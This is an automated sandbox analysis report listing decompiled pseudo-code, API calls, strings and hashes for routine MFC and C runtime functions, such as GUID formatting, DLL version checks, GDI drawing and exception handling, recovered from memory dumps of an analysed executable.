                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpen$AddressH_prolog3ProcQueryValueswprintf
                  • String ID: DllGetClassObject
                  • API String ID: 351166792-1075368562
                  • Opcode ID: a2af5851b5f9c2a8f2810f26ec62040dd75bd947e17a2e76fea4f4d2e651c228
                  • Instruction ID: 5b860a2193ce736a33cf6f6595f981836a9396f171d314495cd57ecb9bcc038c
                  • Opcode Fuzzy Hash: a2af5851b5f9c2a8f2810f26ec62040dd75bd947e17a2e76fea4f4d2e651c228
                  • Instruction Fuzzy Hash: 10116071600266ABCF10EFA1CC51BBF77B4AF00368F54052EB925A72E1DB39995087AD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00429544, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E00429544(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v264;
				signed int _v268;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t28;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				intOrPtr _t46;
				void* _t47;
				signed int _t50;
				void* _t54;

				_t54 = __eflags;
				_t48 = _t50;
				_t19 =  *0x463404; // 0x38a11573
				_v8 = _t19 ^ _t50;
				_t21 = _a8;
				_t45 = _a4;
				_v268 = _v268 & 0x00000000;
				swprintf( &_v264, 0x100, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",  *_a8,  *(_a8 + 4) & 0x0000ffff,  *(_t21 + 6) & 0x0000ffff,  *(_t21 + 8) & 0x000000ff,  *(_t21 + 9) & 0x000000ff,  *(_t21 + 0xa) & 0x000000ff,  *(_t21 + 0xb) & 0x000000ff,  *(_t21 + 0xc) & 0x000000ff,  *(_t21 + 0xd) & 0x000000ff,  *(_t21 + 0xe) & 0x000000ff,  *(_t21 + 0xf) & 0x000000ff, _t44, _t47);
				_push( &_v264);
				E00406039(_t28, _a4, _t42, _t43, _a4, _t54);
				_pop(_t46);
				return E00430650(_t45, _t28, _v8 ^ _t48, _t42, _t43, _t46);
			}

















                  0x00429544
                  0x00429547
                  0x0042954f
                  0x00429556
                  0x00429559
                  0x00429584
                  0x00429587
                  0x004295ac
                  0x004295ba
                  0x004295bd
                  0x004295c9
                  0x004295d0

                  APIs
                  • swprintf.LIBCMT ref: 004295AC
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  Strings
                  • BE, xrefs: 00429546
                  • {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 004295A1
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3__vsprintf_s_lswprintf
                  • String ID: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}$BE
                  • API String ID: 3725010724-2349691909
                  • Opcode ID: 0be7013e89477d83986835f1b6856c71d5ba30b29e557d3825a3ce492c276c41
                  • Instruction ID: a3497880cab5cd600a8beb7780eea5b2b7ea81012c6d0ff42360ce47a048c1db
                  • Opcode Fuzzy Hash: 0be7013e89477d83986835f1b6856c71d5ba30b29e557d3825a3ce492c276c41
                  • Instruction Fuzzy Hash: 091148B51180A46AC3198B9A9CA4E76BFF85B0C302F0980CEF5C95B192D57CD640CB38
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00415621, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E00415621(void* __ecx) {
				signed int _v8;
				char _v20;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				long _t12;
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t29;
				signed int _t34;

				_t32 = _t34;
				_t9 =  *0x463404; // 0x38a11573
				_v8 = _t9 ^ _t34;
				_t12 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t12 == 0) {
					L4:
					_t13 = 0;
					__eflags = 0;
				} else {
					_t38 = _t12 - 0x104;
					if(_t12 == 0x104) {
						goto L4;
					} else {
						 *(PathFindExtensionA( &_v280)) = 0;
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_t13 = E004153B2(_t19,  &_v20, "%s%s.dll", _t38,  &_v20,  &_v280);
						_t25 = _t25;
					}
				}
				_pop(_t29);
				return E00430650(_t13, _t19, _v8 ^ _t32, _t24, _t25, _t29);
			}

















                  0x00415624
                  0x0041562c
                  0x00415633
                  0x00415649
                  0x00415651
                  0x00415686
                  0x00415686
                  0x00415686
                  0x00415653
                  0x00415653
                  0x00415655
                  0x00000000
                  0x00415657
                  0x00415665
                  0x00415670
                  0x00415677
                  0x0041567d
                  0x0041567e
                  0x00415683
                  0x00415683
                  0x00415655
                  0x0041568d
                  0x00415694

                  APIs
                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00415649
                  • PathFindExtensionA.SHLWAPI(?), ref: 0041565F
                    • Part of subcall function 004153B2: __EH_prolog3_GS.LIBCMT ref: 004153BC
                    • Part of subcall function 004153B2: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,00415683,?,?), ref: 004153EC
                    • Part of subcall function 004153B2: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00415400
                    • Part of subcall function 004153B2: ConvertDefaultLocale.KERNEL32(?), ref: 0041543C
                    • Part of subcall function 004153B2: ConvertDefaultLocale.KERNEL32(?), ref: 0041544A
                    • Part of subcall function 004153B2: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00415467
                    • Part of subcall function 004153B2: ConvertDefaultLocale.KERNEL32(?), ref: 00415492
                    • Part of subcall function 004153B2: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0041549B
                    • Part of subcall function 004153B2: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00415550
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                  • String ID: %s%s.dll
                  • API String ID: 1311856149-1649984862
                  • Opcode ID: d1a69b97d847e92fd9b44ca0b99216e3aff88d8da71c5e72d01b3b1870190964
                  • Instruction ID: 7ab096ee9f5a6c228af4c8b577f9b175102377d2c61d11fa4c3138e872793942
                  • Opcode Fuzzy Hash: d1a69b97d847e92fd9b44ca0b99216e3aff88d8da71c5e72d01b3b1870190964
                  • Instruction Fuzzy Hash: DD01D171A001189FCB10DF68DC02AEBB7FCAB89700F0104B6E905E7211DA74AE448BA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040791D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 51%
                  			E0040791D(void* __ecx, void* __edi) {
				signed short _v16;
				signed short _v20;
				char _v24;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t7;
				void* _t18;
				intOrPtr* _t19;
				void* _t24;
				signed int _t25;

				_t7 =  *0x462630; // 0x50052
				_t32 = _t7 - 0xffffffff;
				if(_t7 != 0xffffffff) {
					return _t7;
				}
				_push(_t18);
				_push(_t24);
				_t19 = GetProcAddress(E00407887( *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
				_t25 = 0x40000;
				if(_t19 != 0) {
					E00431160(__edi,  &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t19() >= 0) {
						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x462630 = _t25;
				return _t25;
			}














                  0x00407922
                  0x0040792a
                  0x0040792d
                  0x00407990
                  0x00407990
                  0x0040792f
                  0x00407930
                  0x0040794c
                  0x0040794e
                  0x00407955
                  0x0040795f
                  0x0040796a
                  0x0040796b
                  0x00407976
                  0x00407983
                  0x00407983
                  0x00407976
                  0x00407985
                  0x00000000

                  APIs
                    • Part of subcall function 00407887: GetModuleHandleA.KERNELBASE(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 00407895
                    • Part of subcall function 00407887: LoadLibraryA.KERNEL32(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 004078A5
                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00407946
                  • _memset.LIBCMT ref: 0040795F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleLibraryLoadModuleProc_memset
                  • String ID: DllGetVersion
                  • API String ID: 3385804498-2861820592
                  • Opcode ID: 5b7453e76c9e1d6b03a6d0f12065e1bffe7dffcc9129257384b4349de2f1a944
                  • Instruction ID: cf96501d195ca623c68e994556f6f897d69701b656ef3401447b7e78654c536a
                  • Opcode Fuzzy Hash: 5b7453e76c9e1d6b03a6d0f12065e1bffe7dffcc9129257384b4349de2f1a944
                  • Instruction Fuzzy Hash: CEF03BB1D002155BE7509BFDD845B9B73E85B04754F110136FD10F3291E6B89D0487AA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C884, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041C884(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t47;
				void* _t48;
				void* _t49;

				_t49 = __eflags;
				E00431A9B(E0044BA0A, __ebx, __edi, __esi);
				E00423242(__ebx, _t48 - 0x14, __edi, __esi, _t49);
				_t47 =  *((intOrPtr*)(_t48 + 8));
				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
				_t23 = E00423194(_t47, _t48 - 0x14);
				 *((intOrPtr*)( *_t47 + 0x50))(_t48 - 0x24, GetSysColor(0xc));
				E0041B463(_t47,  *((intOrPtr*)(_t48 - 0x24)),  *((intOrPtr*)(_t48 - 0x20)),  *((intOrPtr*)(_t48 - 0x1c)) -  *((intOrPtr*)(_t48 - 0x24)),  *((intOrPtr*)(_t48 - 0x18)) -  *((intOrPtr*)(_t48 - 0x20)), 0xf00021);
				E00423194(_t47, _t23);
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t48 - 0x14)) = 0x452f4c;
				E0040ADD4(__ebx, _t48 - 0x14, _t23, _t47, _t49);
				return E00431B73(1);
			}







                  0x0041c884
                  0x0041c889
                  0x0041c89a
                  0x0041c89f
                  0x0041c8a2
                  0x0041c8ac
                  0x0041c8bb
                  0x0041c8d9
                  0x0041c8e1
                  0x0041c8e6
                  0x0041c8ed
                  0x0041c8f4
                  0x0041c901

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C889
                  • GetSysColor.USER32(0000000C), ref: 0041C890
                    • Part of subcall function 00423242: __EH_prolog3.LIBCMT ref: 00423249
                    • Part of subcall function 00423242: CreateSolidBrush.GDI32(?), ref: 00423264
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                    • Part of subcall function 0041B463: PatBlt.GDI32(?,?,?,?,?,?), ref: 0041B47A
                    • Part of subcall function 0040ADD4: __EH_prolog3_catch_GS.LIBCMT ref: 0040ADDE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3ObjectSelect$BrushColorCreateH_prolog3_catch_Solid
                  • String ID: L/E
                  • API String ID: 1097662718-2456494276
                  • Opcode ID: e1a511be5031bb41064cd11203baab905edbaed639b95e56e1de4081b40d4594
                  • Instruction ID: 68ff83ec7e2eba05f79b04070f7d705b72ba532b61595986b3c127a4697d77d4
                  • Opcode Fuzzy Hash: e1a511be5031bb41064cd11203baab905edbaed639b95e56e1de4081b40d4594
                  • Instruction Fuzzy Hash: 76010872A001199BCB04EFE9C94AEEEB7F4AF08305F10415AF405B3191CB389E058BA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041FDA4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0041FDA4(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t7;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t25;
				signed int _t26;

				_t24 = __edi;
				_t23 = __edx;
				_t18 = __ebx;
				_t7 =  *0x463404; // 0x38a11573
				_v8 = _t7 ^ _t26;
				_t25 = _a4;
				if(_t25 != 0) {
					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
						goto L1;
					} else {
						GetClassNameA(_t25,  &_v20, 0xa);
						_t16 = E0040D6F3( &_v20, "combobox");
						asm("sbb eax, eax");
						_t11 =  ~_t16 + 1;
					}
				} else {
					L1:
					_t11 = 0;
				}
				return E00430650(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                  0x0041fda4
                  0x0041fda4
                  0x0041fda4
                  0x0041fdac
                  0x0041fdb3
                  0x0041fdb7
                  0x0041fdbc
                  0x0041fdd1
                  0x00000000
                  0x0041fdd3
                  0x0041fdda
                  0x0041fde9
                  0x0041fdf1
                  0x0041fdf4
                  0x0041fdf4
                  0x0041fdbe
                  0x0041fdbe
                  0x0041fdbe
                  0x0041fdbe
                  0x0041fe01

                  APIs
                  • GetWindowLongA.USER32 ref: 0041FDC5
                  • GetClassNameA.USER32(?,?,0000000A), ref: 0041FDDA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClassLongNameWindow
                  • String ID: combobox
                  • API String ID: 1147815241-2240613097
                  • Opcode ID: 5f8404e49d7c1d98f1caf49a06be34272533ddeb7c7ecae2d52f1c27699438b6
                  • Instruction ID: 6153ddf1edffb141858314aed8e53acc64512b60bf2dcf25758a91ac4d9de857
                  • Opcode Fuzzy Hash: 5f8404e49d7c1d98f1caf49a06be34272533ddeb7c7ecae2d52f1c27699438b6
                  • Instruction Fuzzy Hash: 68F096326105196F8B01EFA49C45EBF77A8FB15315B50092AE812E7181DA38EA068699
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401EB0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E00401EB0(signed int _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _t23;
				signed int _t24;
				signed int _t29;
				signed int _t30;
				signed int _t39;
				signed int _t42;
				intOrPtr* _t44;
				signed int _t46;
				signed int _t48;
				intOrPtr* _t51;

				_t39 = _a4;
				if(_t39 > 0) {
					_t24 = _t23 | 0xffffffff;
					_t46 = _t24 % _t39;
					__eflags = _t24 / _t39 - 1;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E00430B93( &_v12, _t46,  &_a4);
						_v16 = 0x44ee2c;
						_t29 = E00430CF4( &_v16, 0x45abf8);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t42 = _v8;
						__eflags = _t42;
						if(_t42 > 0) {
							_t30 = _t29 | 0xffffffff;
							_t48 = _t30 % _t42;
							__eflags = _t30 / _t42 - 2;
							if(__eflags >= 0) {
								goto L7;
							} else {
								_v8 = 0;
								E00430B93( &_v24, _t48,  &_v8);
								_t44 =  &_v28;
								_v28 = 0x44ee2c;
								E00430CF4(_t44, 0x45abf8);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t51 = _t44;
								E00430BE6(_t44, _t48, _v32);
								 *_t51 = 0x44ee2c;
								return _t51;
							}
						} else {
							_t42 = 0;
							__eflags = 0;
							L7:
							return E00404461(__eflags, _t42 + _t42);
						}
					}
				} else {
					_t39 = 0;
					L2:
					return E00404461(0, _t39);
				}
			}



















                  0x00401eb0
                  0x00401eb9
                  0x00401eca
                  0x00401ecf
                  0x00401ed1
                  0x00401ed4
                  0x00000000
                  0x00401ed6
                  0x00401edf
                  0x00401ee7
                  0x00401ef6
                  0x00401efe
                  0x00401f03
                  0x00401f04
                  0x00401f05
                  0x00401f06
                  0x00401f07
                  0x00401f08
                  0x00401f09
                  0x00401f0a
                  0x00401f0b
                  0x00401f0c
                  0x00401f0d
                  0x00401f0e
                  0x00401f0f
                  0x00401f10
                  0x00401f17
                  0x00401f19
                  0x00401f2d
                  0x00401f32
                  0x00401f34
                  0x00401f37
                  0x00000000
                  0x00401f39
                  0x00401f42
                  0x00401f4a
                  0x00401f54
                  0x00401f59
                  0x00401f61
                  0x00401f66
                  0x00401f67
                  0x00401f68
                  0x00401f69
                  0x00401f6a
                  0x00401f6b
                  0x00401f6c
                  0x00401f6d
                  0x00401f6e
                  0x00401f6f
                  0x00401f76
                  0x00401f78
                  0x00401f7d
                  0x00401f86
                  0x00401f86
                  0x00401f1b
                  0x00401f1b
                  0x00401f1b
                  0x00401f1d
                  0x00401f2c
                  0x00401f2c
                  0x00401f19
                  0x00401ebb
                  0x00401ebb
                  0x00401ebd
                  0x00401ec9
                  0x00401ec9

                  APIs
                  • std::exception::exception.LIBCMT ref: 00401EE7
                  • __CxxThrowException@8.LIBCMT ref: 00401EFE
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8Throw_mallocstd::exception::exception
                  • String ID: ,D
                  • API String ID: 4063778783-2732034087
                  • Opcode ID: f55c6ffad4fdc68b5f0d7580b16713416585db3234ee9596b3b0f9ed43f90067
                  • Instruction ID: 1c594be200a3db273ddcf6dcc8e3d269b8c78a2e612c611a6454ac4e5cd0e6b8
                  • Opcode Fuzzy Hash: f55c6ffad4fdc68b5f0d7580b16713416585db3234ee9596b3b0f9ed43f90067
                  • Instruction Fuzzy Hash: B0E0E5B050420066D30CDA61D951A2F72907BC0704F104F2EF91A411C1EB78D60C855B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00435641, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00435641(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E0043059E(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00436178(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00436178(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00430577(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E004353C6(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                  0x00435641
                  0x00435641
                  0x00435641
                  0x00435641
                  0x00435641
                  0x00435644
                  0x0043564a
                  0x00435658
                  0x0043565e
                  0x00435666
                  0x00435672
                  0x0043567a
                  0x00435682
                  0x00435696
                  0x00435698
                  0x0043569c
                  0x004356a1
                  0x004356a7
                  0x004356a9
                  0x004356ab
                  0x004356ae
                  0x00000000
                  0x004356b5
                  0x004356a9
                  0x0043569c
                  0x00435696
                  0x00435682
                  0x004356b6

                  APIs
                    • Part of subcall function 0043059E: __getptd.LIBCMT ref: 004305A4
                    • Part of subcall function 0043059E: __getptd.LIBCMT ref: 004305B4
                  • __getptd.LIBCMT ref: 00435650
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 0043565E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: csm
                  • API String ID: 803148776-1018135373
                  • Opcode ID: 93b84b3fd083976a509b7a3d40727f0b67e2f8566414da68aa08ea54e0d22545
                  • Instruction ID: e998b73cdfcbc4847a3ed670d686110aca20351667a2c74c15cb2f3ab349f30f
                  • Opcode Fuzzy Hash: 93b84b3fd083976a509b7a3d40727f0b67e2f8566414da68aa08ea54e0d22545
                  • Instruction Fuzzy Hash: 80018134801B059BCF34DF26C4426AEB7B5AF1C311F94642FE4495A3A2CB388990CF89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F76D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0040F76D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t15;
				intOrPtr* _t23;
				intOrPtr _t27;
				void* _t28;

				_push(4);
				E00431A9B(E0044B36E, __ebx, __edi, __esi);
				_t27 = __ecx;
				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x450e14;
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				if( *((intOrPtr*)(__ecx + 0x20)) != 0 && __ecx != 0x466348 && __ecx != 0x4663a0 && __ecx != 0x4663f8 && __ecx != 0x466450) {
					E0040F092(__ebx, __ecx);
				}
				_t23 =  *((intOrPtr*)(_t27 + 0x4c));
				if(_t23 != 0) {
					 *((intOrPtr*)( *_t23 + 4))(1);
				}
				_t15 =  *((intOrPtr*)(_t27 + 0x50));
				if(_t15 != 0 &&  *(_t15 + 0x28) == _t27) {
					 *(_t15 + 0x28) =  *(_t15 + 0x28) & 0x00000000;
				}
				 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
				return E00431B73(E004126F7(_t27));
			}







                  0x0040f76d
                  0x0040f774
                  0x0040f779
                  0x0040f77b
                  0x0040f77e
                  0x0040f784
                  0x0040f78c
                  0x0040f7ae
                  0x0040f7ae
                  0x0040f7b3
                  0x0040f7b8
                  0x0040f7be
                  0x0040f7be
                  0x0040f7c1
                  0x0040f7c6
                  0x0040f7cd
                  0x0040f7cd
                  0x0040f7d1
                  0x0040f7e1

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID: HcF$PdF
                  • API String ID: 431132790-1855547554
                  • Opcode ID: 954c6daa274b624ccb132f90fb8015d634208a0bf4d08cf6dc5a681c79da50d4
                  • Instruction ID: 7e17d0bdb83c1bc18564c837a7577767b54507c0bb6134c2b92ef08d8e005f70
                  • Opcode Fuzzy Hash: 954c6daa274b624ccb132f90fb8015d634208a0bf4d08cf6dc5a681c79da50d4
                  • Instruction Fuzzy Hash: 7BF0F9359103108BDB34AB69814436EB2A0BF04719F11463FE85567BE1D7BC8CC4C68F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426219, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00426219(void* __ecx, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t12;
				void* _t14;
				void* _t17;
				_Unknown_base(*)()* _t19;
				void* _t20;

				_push(0);
				E00431A9B(E0044C14C, _t14, _t17, __esi);
				if(( *0x4668dc & 0x00000001) == 0) {
					 *0x4668dc =  *0x4668dc | 0x00000001;
					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
					_push("UxTheme.dll");
